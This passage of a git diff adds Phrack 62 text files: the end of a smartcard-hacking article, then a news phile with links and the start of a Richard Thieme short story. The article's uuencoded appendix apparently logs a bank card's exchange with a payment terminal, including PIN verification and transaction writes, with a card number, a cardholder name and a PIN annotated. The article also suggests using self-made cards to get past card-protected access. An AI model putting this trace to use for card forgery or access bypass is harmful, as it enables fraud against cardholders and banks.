+self made viaccess/seca smartcard and enter in almost place protected with 
+smartcard or magnetic cards. Or just keep it for you ;)
+
+--[ 11 - Greetings ]-------------------------------------------------------
+
+	Roland Moreno ;)
+
+--[ 12 - Bibliography ]----------------------------------------------------
+
+    -PC et Cartes a puce, Patrick Gueule
+	-Ender's Game, Orson Scott Card
+	-The Hitchhiker's Trilogy, Douglas Adams
+	-Discworld, Terry Pratchett
+ 
+--[ Appendix A: Communication log - old_log.txt (uuencoded) ---------------
+
+<++> ./old_log.txt.uue
+
+begin 744 old_log.txt
+M("`@("`@("`@("`@("`@(",C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C
+M(R,C(R,C#0H@("`@("`@("`@("`@("`@(R`@("`@("`@("`@("`@("`@("`@
+M("`@("`@("`@("`@(",-"B`@("`@("`@("`@("`@("`C("!(3U=43R`Z(%!A
+M>2!7:71H(%9I<G1U86P@0V%S:"`@(PT*("`@("`@("`@("`@("`@(",@("`@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`C#0H@("`@("`@("`@("`@
+M("`@(R`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@(",-"B`@("`@
+M("`@("`@("`@("`C("`Q-"\P,2\R,#`R("`@("`@("`@("`@("`@("`@("`@
+M(PT*("`@("`@("`@("`@("`@(",@("`@("`@("`@("`@("`@("`@("`@("`@
+M("`@("`@("`C#0H@("`@("`@("`@("`@("`@(R,C(R,C(R,C(R,C(R,C(R,C
+M(R,C(R,C(R,C(R,C(R,C(R,-"@T*#0H@("`@4VEM=6QA=&EO;B!O9B!A('1R
+M86YS86-T:6]N(&)E='=E96X@82!C<F5D:70@8V%R9"!#4#@@;6%S:S0@87!P
+M;&EC871I;VX@#0I","<@86YD(&%N(&5L96-T<F]N:6,@<&%Y;65N="!T97)M
+M:6YA;"!#2T0@4S(P-3`N(%1H92!N;W1A=&EO;B!I<R!L:6ME('1H870@.@T*
+M("`@("`^/E1E<FUI;F%L#0H@("`@($-A<F0@#0I4:&4@9FER<W0@<75A<G1E
+M="`H-"!B:71S*2!O9B!E86-H('=O<F0@*#$V(&)I=',I(&-O;F-E<FX@=&AE
+M(')I9VAT("AR=RD@;V8@#0ID871A<RP@97AC97!T(&EN(&-O;G-T<G5C=&]R
+M(&%R96$@6S`Y($,P72X@#0H@("`@,B`M(#,N("!R96%D+6]N;'D@9F]R($%L
+M;`T*("`@(#8@+2`W+B`@<F5A9"UO;FQY(&9O<B!5<V5R("A024X@96YT97)E
+M9"D-"B`@("!&+B`@("`@(')E860O=W)I=&4@9F]R(%5S97(-"E)E860@:6YS
+M=')U8W1I;VX@.B!"0R!","!;04$@04%=($Q%+"!W:&5R92!!02!!02!I<R!A
+M;B!A9&1R97-S(&%N9"!,12!T:&4-"FQE;F=H="!I;B!B>71E+@T*0WEP:&5R
+M(&EN<W1R=6-T:6]N(#H@0D,@*#@P?#@T*2`P,"`P,"`P."`M($=E="`Z($)#
+M($,P(#`P(#`P(#`X#0I7<FET92!I;G-T<G5C=&EO;B`Z($)#($0P(%M!02!!
+M05T@3$4L('=H97)E($%!($%!(&ES(&%N(&%D9')E<W,@86YD($Q%('1H90T*
+M;&5N9VAT(&EN(&)Y=&4N#0I!8VMN;W=L961G92`Z(#DP(#`P#0I4:&4@:6YS
+M=')U8W1I;VX@:7,@86QW87ES(')E<&5A=&5D(&)A8VL@=&\@=&AE('1E<FUI
+M;F%L+@T*0U-.+"!-86YU9F%C='5R97(L(&%N9"!0;VEN=&5U<G,@=&\@07)E
+M82!A<F4@0U)#(&-H96-K960@=VET:"`Q,#$P,#$N#0H-"BLM+2TM+2TM+2L-
+M"GP@24Y315)4('P-"GP@($-!4D0@('P-"BLM+2TM+2TM+2L-"@T*+2TM+2TM
+M+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM
+M+2TM+2TM+0T*("`@(#X^1D8@("`@("`@("`@("`@("`@("`@("`@("`\+2T@
+M4F5S970-"B`@("`S1B`V-2`R-2`P."`S-B`P-"`V0R`Y,"`P,"`@/"TM($%4
+M4B`H06YS=V5R(%1O(%)E<V5T*0T*+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM
+M+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+0T*#0HO*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ#0H@*B!296%D('1A8FQE(&]F(&%R96$@("`@("`@("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`J#0H@*B`J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#0H@("`@
+M/CY"0R!","`P.2!#,"`R,`T*("`@($(P(`T*("`@(#%$(#E&($8U(#$V("`@
+M("`@/"TM(%)E861I;F<@<&]I;G1E<G,-"B`@("`R,R`Y1B`P02!#,R`@("`@
+M(#PM+2!!1$P@/2`P."`X,"`H.48@,$$I+"!C<F5D:70@8V%R9"!O;&1E<B!T
+M:&%N(#$Q+SDY#0H@("`@,$$@0S,@,$$@-3<@#0H@("`@,#D@1C$@,#@@1#D@
+M#0H@("`@,T8@134@,C`@,#(@("`@("`\+2T@0W)E9&ET(&-A<F0@87!P;&EC
+M871I;VX-"B`@("`P."`T1"`P,"!",2`@("`@(#PM+2!-86YU9F%C='5R97(@
+M240@*%-H;'5M8F5R9V5R*0T*("`@(#0T($,R(#A!(#!%("`@("`@/"TM($-3
+M3B`Z($-A<F0@4V5R:6%L($YU;6)E<@T*("`@($5"(#0Y(#E&($-#(`T*("`@
+M(#DP(#`P(`T*#0H@("`@/CY&1B`@("`@("`@("`@("`@("`@("`@("`@(#PM
+M+2!297-E=`T*("`@(#-&(#8U(#(U(#`X(#,V(#`T(#9#(#DP(#`P("`\+2T@
+M0512("A!;G-W97(@5&\@4F5S970I#0HM+2TM+2TM+2TM+2TM+2TM+2TM+2TM
+M+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM#0H-"B\J*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BH-"B`J($%U=&AE;G1I8V%T92!#87)D('=I=&@@82!S=&%T:6,@
+M<VEG;F%T=7)E(%)302`S,C!B:71S("H-"B`J("HJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHO#0H-"B`@
+M("`^/D)#($(P(#`Y($,P(#(P(`T*("`@($(P(`T*("`@(#%$(#E&($8U(#$V
+M("`@("`@/"TM(')E861I;F<@86=A:6X@;6%N=69A8W1U<F5R(&%R96$-"B`@
+M("`R,R`Y1B`P02!#,R`-"B`@("`P02!#,R`P02`U-R`-"B`@("`P.2!&,2`P
+M."!$.2`-"B`@("`S1B!%-2`R,"`P,B`-"B`@("`P."`T1"`P,"!",2`-"B`@
+M("`T-"!#,B`X02`P12`-"B`@("!%0B`T.2`Y1B!#0R`-"B`@("`Y,"`P,"`-
+M"@T*("`@(#X^0D,@0C`@,#@@13`@-S`-"B`@("!","`@#0H@("`@,D4@,#,@
+M,S`@,S,@("`@("`\+2T@<')O=FED97(@,#,@.B!!=71H96YT:69I8V%T:6]N
+M(%9A;'5E("A24T$@,S(P(&)I=',I#0H@("`@,S`@,#`@,#D@,C$@#0H@("`@
+M,T(@,D8@.#0@-40@#0H@("`@,T$@1CD@.$4@-$0@#0H@("`@,S(@.#(@03`@
+M,C<@#0H@("`@,S8@1C@@,30@-#$@#0H@("`@,S0@1C$@-$8@140@#0H@("`@
+M,T(@-30@1#$@,C,@#0H@("`@,S,@,38@0CD@-#$@#0H@("`@,S,@1C0@.#(@
+M0T,@#0H@("`@,S$@1D,@.3(@1#0@#0H@("`@,S,@.$,@-S4@138@#0H@("`@
+M,S(@1C(@,$8@-SD@#0H-"B`@("`R12`P,B`S."!&,2`@("`@(#PM+2!P<F]V
+M:61E<B`P,B`Z($ED96YT:71Y(&%R96$-"B`@("`S,"`P-"`Y-R`Q,2`@("`@
+M(#PM+2!004X@.B!0<FEM87)Y($%C;W5N="!.=6UB97(@.@T*("`@(#,V(#<T
+M(#@P(#8W("`@("`@/"TM(#0Y-S$@,38W-"`X,#8W(#8S,S$@*$-R961I="!!
+M9W)I8V]L92D-"B`@("`S-B`S,R`Q1B!&1B`-"B`@("`S,2`P,2`Y.2`Q,2`@
+M("`@(#PM+2!&86)R:6-A=&EO;B!$871E(#H@,3$O.3DL('9A;&ED('5N=&EL
+M;"`P,2\P,@T*("`@(#,R(#4P(#`R(#`Q("`@("`@/"TM($QA;F<@,C4P(#H@
+M9G(@+R!-;VYE>2`R-3`@.B!F<B`O(%-E<G9I8V4@,3`Q(#H@:6YT;`T*("`@
+M(#,R(#4P(#,T(#DW("`@("`@/"TM(%)302!E>'!O;F5N="!E(#T@,RP@5FES
+M82!#87)D("@T.3<I#0H@("`@,S0@1#4@,C(@,#0@("`@("`\+2T@3D%-12`Z
+M(")-4B!*14%.($U!4D-/("`@("`@("`@("`@("(@#0H@("`@,T$@-#4@-#$@
+M-$4@#0H@("`@,S(@,#0@1#0@,34@#0H@("`@,S(@-#,@-$8@,C`@#0H@("`@
+M,S(@,#(@,#(@,#(@#0H@("`@,S`@,C`@,C`@,C`@#0H@("`@,S(@,#(@,#(@
+M,#(@#0H@("`@,S`@,C`@1C$@,#`@("`@(#PM+2!"24X@.B!"86YK($E$($YU
+M;6)E<B`](#$P,"`Z($-R961I="!!9W)I8V]L90T*("`@(#DP(#`P(`T*#0H@
+M("`@/CY&1B`@("`@("`@("`@("`@("`@("`@("`@(#PM+2!297-E=`T*("`@
+M(#-&(#8U(#(U(#`X(#,V(#`T(#9#(#DP(#`P("`\+2T@0512("A!;G-W97(@
+M5&\@4F5S970I#0HM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM
+M+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM#0H-"B\J*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BH-"B`J
+M($%U=&AE;G1I8V%T92!O=VYE<B`@("`@("`@("`@("`@("`@("`@("`@("`@
+M("`@("`@("`@("H-"B`J("HJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHO#0H-"B`@("`^/D)#($(P(#`Y
+M($8P(#`T#0H@("`@0C`@#0H@("`@-#0@0S(@.$$@,$4@("`@("`\+2T@0U-.
+M#0H@("`@.3`@,#`@#0H@("`@#0H@("`@/CY"0R`R,"`P,"`P,"`P-"`-"B`@
+M("`R,"`@("`@("`@("`@("`@(#PM+2!!<VMI;F<@4$E.(&-O9&4-"B`@("`P
+M-"`X1"`S1B!&1B`@("`@(#PM+2!024X@/2`Q,C,T#0H@("`@.3`@,#`@#0H@
+M("`@#0H@("`@/CY"0R`T,"`P,"`P,"`P,"`-"B`@("`T,"`Y,"`P,"`@("`@
+M("`@(#PM+2!2871I9FEC871I;VX@4$E.+"!/2R`[*2`-"@T*+RHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*@T*("H@1V5N97)A=&4@0T%)(&9O<B!P87EM96YT("`@("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@*@T*("H@*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"B`-"B`@("`^
+M/D)#($(P(#`X($0P(#`T(`T*("`@($(P("`@("`@("`@("`@("`@/"TM(%)E
+M861I;F<@1VQO8F%L($-H96-K<W5M("@P."!$,"D-"B`@("`W,"!&1B`X1B!&
+M1B`-"B`@("`Y,"`P,"`-"@T*("`@(#X^0D,@.#`@,#`@,#`@,#@@/"TM($-Y
+M<&AE<FEN9R`H,7-T(&ME>2D@9F]R($-!22P@<V%L="`P."!$,"`H;F5E9"!0
+M24XI#0H@("`@-T8@#0H@("`@/CXP,0T*("`@(#=&(`T*("`@(#X^,30-"B`@
+M("`W1B`-"B`@("`^/C(Q#0H@("`@-T8@#0H@("`@/CXU-`T*("`@(#=&(`T*
+M("`@(#X^,#@-"B`@("`W1B`-"B`@("`^/C`P#0H@("`@-T8@#0H@("`@/CXP
+M.`T*("`@(#=&(`T*("`@(#X^1#`@("`@("`@("`@("`@/"TM(#`Q(#$T(#(Q
+M(#4T(#`X(#`P(%LP."!$,%T-"B`@("`Y,"`P,"`@#0H-"B`@("`^/D)#($,P
+M(#`P(#`P(#`X(#PM+2!296%D:6YG(')E<W5L=`T*("`@($,P("`@("`@("`@
+M("`@("`@#0H@("`@,#$@,30@,C$@-30@,#@@,#`@,#@@1#`@/"TM(%=E;&PN
+M+BX@35D@86YS=V5R(#LI#0H@("`@.3`@,#`@#0H-"B`@("`^/D)#(#@P(#`P
+M(#`P(#`X(#PM+2!#>7!H97)I;F<@*$-"0R!-;V1E*0T*("`@(#=&(`T*("`@
+M(#X^,C$-"B`@("`W1B`-"B`@("`^/C4T#0H@("`@-T8@#0H@("`@/CXP.0T*
+M("`@(#=&(`T*("`@(#X^,#`-"B`@("`W1B`-"B`@("`^/C`X#0H@("`@-T8@
+M#0H@("`@/CY&-2`@("`-"B`@("`W1B`-"B`@("`^/C`X#0H@("`@-T8@#0H@
+M("`@/CY$,"`@("`@("`@("`@("`\+2T@,C$@-30@,#D@,#`@,#@@1C4@6S`X
+M($0P72`-"B`@("`Y,"`P,"`-"@T*("`@(#X^0D,@0S`@,#`@,#`@,#@@/"TM
+M(%)E861I;F<@<F5S=6QT#0H@("`@0S`@#0H@("`@,C$@-30@,#D@,#`@,#@@
+M1C4@,#@@1#`@#0H@("`@.3`@,#`@#0H-"B`@("`^/D)#(#@P(#`P(#`P(#`X
+M(#PM+2!#>7!H97)I;F<-"B`@("`W1B`-"B`@("`^/C`Y#0H@("`@-T8@#0H@
+M("`@/CXR,`T*("`@(#=&(`T*("`@(#X^,4,-"B`@("`W1B`-"B`@("`^/D,S
+M#0H@("`@-T8@#0H@("`@/CXQ1@T*("`@(#=&(`T*("`@(#X^1C<-"B`@("`W
+M1B`-"B`@("`^/C`X#0H@("`@-T8@#0H@("`@/CY$,"`@("`@("`@("`@("`\
+M+2T@,#D@,C`@,4,@0S,@,48@1C<@6S`X($0P70T*("`@(#DP(#`P(`T*#0H@
+M("`@/CY"0R!#,"`P,"`P,"`P."`\+2T@4F5A9&EN9R!R97-U;'0-"B`@("!#
+M,"`@("`@("`@("`@("`@(`T*("`@(#`Y(#(P(#%#($,S(#%&($8W(#`X($0P
+M(#PM+2!#04D@*'=H870@:7,@;VX@=&AE(&YO=&4I#0H@("`@.3`@,#`@#0H-
+M"B\J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BH-"B`J(%)E860@5')A;G-A8W1I;VX@8G5L;&5T:6X@
+M86YD('=R:71E('1R86YS86-T:6]N("`@("`@("H-"B`J("HJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHO
+M#0H-"B`@("`^/D)#($(P(#`R($(P($9#(#PM+2!296%D:6YG('1R86YS86-T
+M:6]N(&)U;&QE=&EN(#H@0414#0H@("`@0C`@(`T*("`@(#,P(#`P(#DY(#$Q
+M("`@("`@/"TM($1U<FEN9R!M;VYT:"!O9B`Q,2\Y.0T*("`@(#,R($0X($0T
+M(#@P("`@("`@/"TM(&]N(#(W(#H@-30T+#`P($9R#0H@("`@,S,@13`@1#@@
+M-C@@("`@("`\+2T@;VX@,C@@.B`U-30L,#`@1G(-"B`@("`S,R!%,"!!1B!#
+M."`@("`@(#PM+2!O;B`R."`Z(#0T-RPT-"!&<@T*("`@(#,S($4X($-#(#0V
+M("`@("`@/"TM(&]N(#(Y(#H@-3(R+#DT($9R#0H@("`@,S,@13@@044@-S0@
+M("`@("`\+2T@;VX@,CD@.B`T-#8L-C`@1G(-"B`@("`S,"`P,"`Y.2`Q,B`@
+M("`@(#PM+2!$=7)I;F<@;6]N=&@@;V8@,3(O.3D-"B`@("`S,R`Q."`S,B!#
+M."`@("`@(#PM+2!O;B`P,R`Z(#$S,"PP,"!&<@T*("`@(#,S(#(P($)&(#8X
+M("`@("`@/"TM(&]N(#`T(#H@-#DP+#`P($9R#0H@("`@,S,@1#@@.48@-#(@
+M("`@("`\+2T@;VX@,C<@.B`T,#<L-S`@1G(-"B`@("`S,"`P,"`P,B`P,2`@
+M("`@(#PM+2!$=7)I;F<@;6]N=&@@;V8@,#$O,#(-"B`@("`S,R`P."`R-R`Q
+M,"`@("`@(#PM+2!O;B`P,2`Z(#$P,"PP,"!&<@T*("`@($9&($9&($9&($9&
+M("`@("`@/"TM($9I<G-T(&5M<'1Y('=O<F0-"B`@("`N+B`N+B`N+B`N+@T*
+M("`@($9&($9&($9&($9&(`T*("`@(#DP(#`P(`T*#0H@("`@/CY"0R!","`P
+M-"!!."!&0R`\+2T@1F]L;&]W:6YG(&]F(')E861I;F<@0414#0H@("`@0C`@
+M#0H@("`@1D8@1D8@1D8@1D8@#0H@("`@+BX@+BX@+BX@+BX-"B`@("!&1B!&
+M1B!&1B!&1B`-"B`@("`Y,"`P,"`-"@T*("`@(#X^0D,@0C`@,#8@03`@1D,@
+M/"TM($%G86EN($%$5`T*("`@($(P(`T*("`@($9&($9&($9&($9&(`T*("`@
+M("XN("XN("XN("XN#0H@("`@1D8@1D8@1D8@1D8@#0H@("`@-C8@,#0@,3`@
+M13,@("`@("`\+2T@36%X:6UU;2!F;W(@<&%Y;65N=`T*("`@(#<S(#-$($)"
+M($$P("`@("`@/"TM($-A<V@@<&%Y;65N="`Z(#DP,#`L,#`@1G(@979E<GD@
+M-R!D87ES#0H@("`@.3`@,#`@#0H-"B`@("`^/D)#($(P(#`X(#DX(#(T(&9O
+M;&QO=VEN9R`H96YD(&]F(&%D="D-"B`@("!","`@#0H@("`@-S4@-S0@.3,@
+M13`@("`@("`\+2T@0W)E9&ET(#,P,#`L,#`@1G(@979E<GD@-R!D87ES#0H@
+M("`@-S<@-S0@.3,@13`@("`@("`\+2T@0V%S:"`S,#`P+#`P($9R(&5V97)Y
+M(#<@9&%Y<PT*("`@(#<Y(#<T(#DS($4P("`@("`@/"TM(%9I<F5M96YT<R`S
+M,#`P+#`P($9R(&5V97)Y(#<@9&%Y<PT*("`@(#9%(#$Q(#`T($4S("`@("`@
+M/"TM(%!E<G-O;FYA;&ES871I;VX@87)E80T*("`@(#<Q(#@S(#`Q(#$P("`@
+M("`@/"TM($1A>2`Z(#$X,RP@3&]C871I;VX@,#$L(%!E<G-O;FYA;&ES871O
+M<B`Q,`T*("`@(#9%(#`P(#`X($4R("`@("`@#0H@("`@1D8@1D8@1D8@1D8@
+M#0H@("`@-S`@1D8@.$8@1D8@("`@("`\+2T@1VQO8F%L($-H96-K<W5M#0H@
+M("`@1D8@1D8@1D8@1D8@#0H@("`@.3`@,#`@#0H-"B`@("`^/D)#($(P(#`S
+M(#$P(#`T(`T*("`@($(P(`T*("`@($9&($9&($9&($9&("`@("`@/"TM(&9I
+M<G-T(&5M<'1Y('=O<F0@:6X@0414(#H@,#,@,3`-"B`@("`Y,"`P,"`-"@T*
+M("`@(#X^0D,@1#`@,#,@,3`@,#0@/"TM(%=R:71T:6YG('1R86YS86-T:6]N
+M#0H@("`@,D8@(`T*("`@(#X^,S,-"B`@("`R1B`-"B`@("`^/C<P#0H@("`@
+M,D8@#0H@("`@/CXR-PT*("`@(#)&(`T*("`@(#X^,3`@("`@("`@("`@("`@
+M/"TM(#,S(#<P(#(W(#$P+"!"=7D@,3`P+#`P($9R('1H92`P>#<P+S@],31T
+M:"!J86X@,C`P,@T*("`@(#DP(#`P(`T*#0H@("`@/CY"0R!","`P,R`Q,"`P
+M-"`\+2T@4F5A9&EN9R!W<FET=&5N('1R86YS86-T:6]N#0H@("`@0C`@#0H@
+M("`@,S,@-S`@,C<@,3`@("`@("`@#0H@("`@.3`@,#`@#0H-"B`@("`^/D)#
+M(#<P(#`S(#$P(#`P(#PM+2!686QI9&%T92!W<FET=&EN9PT*("`@(#<P(`T*
+M("`@(#DP(#`P(`T*#0H@("`@/CY"0R!","`P,R`Q,"`P-"`\+2T@5F5R:69Y
+M:6YG('9A;&ED871E("AV86QI9&%T:6]N(&)I="!I<R`](#$@.RD-"B`@("!"
+M,"`-"B`@("`S,R`W,"`R-R`Q,"`-"B`@("`Y,"`P,"`-"@T*+RHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*@T*("H@1V5N97)A=&4@5F5R:69Y97(@0T%)("AK97ER:6YG(#,I("`@
+M("`@("`@("`@("`@("`@("`@*@T*("H@*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"BTM+2TM+2TM
+M+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM
+M+2TM+2T-"B`@("`^/D9&("`@("`@("`@("`@("`@("`@("`@("`@/"TM(%)E
+M<V5T#0H@("`@,T8@-C4@,C4@,#@@,S8@,#0@-D,@.3`@,#`@(#PM+2!!5%(@
+M*$%N<W=E<B!4;R!297-E="D-"BTM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM
+M+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2T-"@T*("`@(#X^0D,@
+M0C`@,#D@1C`@,#0@#0H@("`@0C`@#0H@("`@-#0@0S(@.$$@,$4@("`@("`\
+M+2T@4F5A9&EN9R!#4TX-"B`@("`Y,"`P,"`-"@T*("`@(#X^0D,@0C`@,#D@
+M-3`@,#0@#0H@("`@0C`@#0H@("`@,S`@,#0@.3<@,3$@("`@("`\+2T@4F5A
+M9&EN9R!B96=I;FYI;F<@;V8@4$%.(&9O<B!304Q4#0H@("`@.3`@,#`@#0H-
+M"B`@("`^/D)#(#@T(#`P(#`P(#`X(#PM+2!#>7!H97)I;F<@*#-R9"!K97DI
+M+"!386QT(#T@,#D@-3`-"B`@("`W0B`-"B`@("`^/C(V#0H@("`@-T(@#0H@
+M("`@/CY$1@T*("`@(#="(`T*("`@(#X^138-"B`@("`W0B`-"B`@("`^/C)"
+M#0H@("`@-T(@#0H@("`@/CY&0PT*("`@(#="(`T*("`@(#X^1C$-"B`@("`W
+M0B`-"B`@("`^/C`Y#0H@("`@-T(@#0H@("`@/CXU,"`@("`@("`@("`@("`\
+M+2T@,C8@1$8@138@,D(@1D,@1C$@6S`Y(#4P70T*("`@(#DP(#`P(`T*#0H@
+M("`@/CY"0R!#,"`P,"`P,"`P."`\+2T@4F5S=6QT#0H@("`@0S`@(`T*("`@
+M(#(V($1&($4V(#)"($9#($8Q(#`Y(#4P(`T*("`@(#DP(#`P(`T*#0H@("`@
+M/CY"0R!","`P.2`V."`P-"`-"B`@("!","`-"B`@("`S,2`P,2`Y.2`Q,2`@
+M("`@(#PM+2!296%D:6YG(&9A8G)I8V%T:6]N(&1A=&4@9F]R('-A;'0-"B`@
+M("`Y,"`P,"`-"@T*("`@(#X^0D,@.#0@,#`@,#`@,#@@/"TM($-Y<&AE<FEN
+M9RP@<V%L="`](#`Y(#8X#0H@("`@-T(@#0H@("`@/CXX,`T*("`@(#="(`T*
+M("`@(#X^.$(-"B`@("`W0B`-"B`@("`^/D8Y#0H@("`@-T(@#0H@("`@/CXY
+M,@T*("`@(#="(`T*("`@(#X^-#<-"B`@("`W0B`-"B`@("`^/C8T#0H@("`@
+M-T(@#0H@("`@/CXP.0T*("`@(#="(`T*("`@(#X^-C@@("`@("`@("`@("`@
+M/"TM(#@P(#A"($8Y(#DR(#0W(#8T(%LP.2`V.%T-"B`@("`Y,"`P,"`-"@T*
+M("`@(#X^0D,@0S`@,#`@,#`@,#@@/"TM($=E="!R97-U;'0-"B`@("!#,"`X
+M,"`X0B!&.2`Y,B`T-R`V-"`P.2`V."`-"B`@("`Y,"`P,"`-"B`@("`-"B`@
+M("`^/D)#($(P(#`Y(#<P(#`T(#PM+2!296%D:6YG(&5X<&ER871I;VX@9&%T
+M92!F;W(@<V%L=`T*("`@($(P(`T*("`@(#,R(#4P(#`R(#`Q(`T*("`@(#DP
+M(#`P(`T*#0H@("`@/CY"0R`X-"`P,"`P,"`P."`\+2T@0WEP:&5R:6YG('=I
+M=&@@<V%L="`](#`Y(#<P#0H@("`@-T(@#0H@("`@/CY$0PT*("`@(#="(`T*
+M("`@(#X^.3@-"B`@("`W0B`-"B`@("`^/C$Y#0H@("`@-T(@#0H@("`@/CXQ
+M-0T*("`@(#="(`T*("`@(#X^-C@-"B`@("`W0B`-"B`@("`^/C-&#0H@("`@
+M-T(@#0H@("`@/CXP.0T*("`@(#="(`T*("`@(#X^-S`@("`@("`@("`@("`@
+M/"TM($1#(#DX(#$Y(#$U(#8X(#-&(%LP.2`W,%T-"B`@("`Y,"`P,"`-"@T*
+M("`@(#X^0D,@0S`@,#`@,#`@,#@@/"TM($=E="!R97-U;'0-"B`@("!#,"`-
+M"B`@("!$0R`Y."`Q.2`Q-2`V."`S1B`P.2`W,"`-"B`@("`Y,"`P,"`-"@T*
+M+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM
+M+2TM+2TM+2TM+2TM+0T*#0HK+2TM+2TM+2TM*PT*?"!2151)4D5:('P-"GP@
+M($-!4E1%("!\#0HK+2TM+2TM+2TM*PT*#0I%;F0@;V8@=')A;G-A8W1I;VX-
+%"@T*#0H`
+`
+end
+
+<++> ./old_log.txt.uue
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/16.txt b/phrack62/16.txt
new file mode 100644
index 0000000..3a9fe5a
--- /dev/null
+++ b/phrack62/16.txt
@@ -0,0 +1,1314 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x10 of 0x10
+
+|=-----------------------------------------------------------------------=|
+|=--------------------=[ W O R L D   N E W S ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+1 - Break, Memory, by Richard Thieme
+2 - The Geometry of Near, by Richard Thieme
+3 - The Feasibility of Anarchy in America, by Anthony
+
+*** QUICK NEWS quiCK NEWS QUICK NEWS QUICK NEWS QUICK NEWS QUICK NEWS ***
+
+- Windows source code leaked
+http://ww.kuro5hin.org/story/2004/2/15/71552/7795
+http://www.wired.com/news/technology/0,1282,62282,00.html
+
+- grsecurity 'Spender' makes fun of OpenBSD and Mac OS X
+http://seclists.org/lists/fulldisclosure/2004/Jun/0647.html
+
+- These guys have all the books about terrorist/anarchy/combat/...
+http://www.paladin-press.com
+
+- 29A releases first worm that spreads via mobile network
+http://securityresponse.symantec.com/avcenter/venc/data/epoc.cabir.html
+
+ 
+|=-----------------------------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+
+                                Break, Memory
+
+                                     By
+
+                               Richard Thieme
+
+
+
+                        The Evolution of the Problem
+
+      The problem was not that people couldn't remember; the problem was
+that people couldn't forget.
+      As far back as the 20th century, we realized that socio-historical
+problems were best handled on a macro level. It was inefficient to work on
+individuals who were, after all, nothing but birds in digital cages. Move
+the cage, move the birds. The challenge was to build the cage big enough to
+create an illusion of freedom in flight but small enough to be moved
+easily.
+      When long-term collective memory became a problem in the 21st
+century, it wound up on my desktop.  There had always been a potential for
+individuals to connect the dots and cause a contextual shift. We managed
+the collective as best we could with Chomsky Chutes but an event could
+break out randomly at any time like a bubble bursting. As much as we
+surveil the social landscape with sensors and datamine for deep patterns,
+we can't catch everything. It's all sensors and statistics, after all,
+which have limits. If a phenomenon gets sticky or achieves critical mass,
+it can explode through any interface, even create the interface it needs at
+the moment of explosion. That can gum up the works.
+      Remembering and forgetting changed after writing was invented. The
+ones that remembered best had always won. Writing shifted the advantage
+from those who knew to those who knew how to find what was known.
+Electronic communication shifted the advantage once again to those who knew
+what they didn't need to know but knew how to get it when they did. In the
+twentieth century advances in pharmacology and genetic engineering
+increased longevity dramatically and at the same time meaningful
+distinctions between backward and forward societies disappeared so far as
+health care was concerned. The population exploded everywhere
+simultaneously.
+      People who had retired in their sixties could look forward to sixty
+or seventy more years of healthful living. As usual, the anticipated
+problems - overcrowding, scarce water and food, employment for those who
+wanted it - were not the big issues.
+      Crowding was managed by staggered living, generating  niches in many
+multiples of what used to be daylight single-sided life. Life became double-
+sided, then triple-sided, and so on. Like early memory storage devices that
+packed magnetic media inside other media, squeezing them into every bit of
+available space, we designed multiple niches in society that allowed people
+to live next to one another in densely packed communities without even
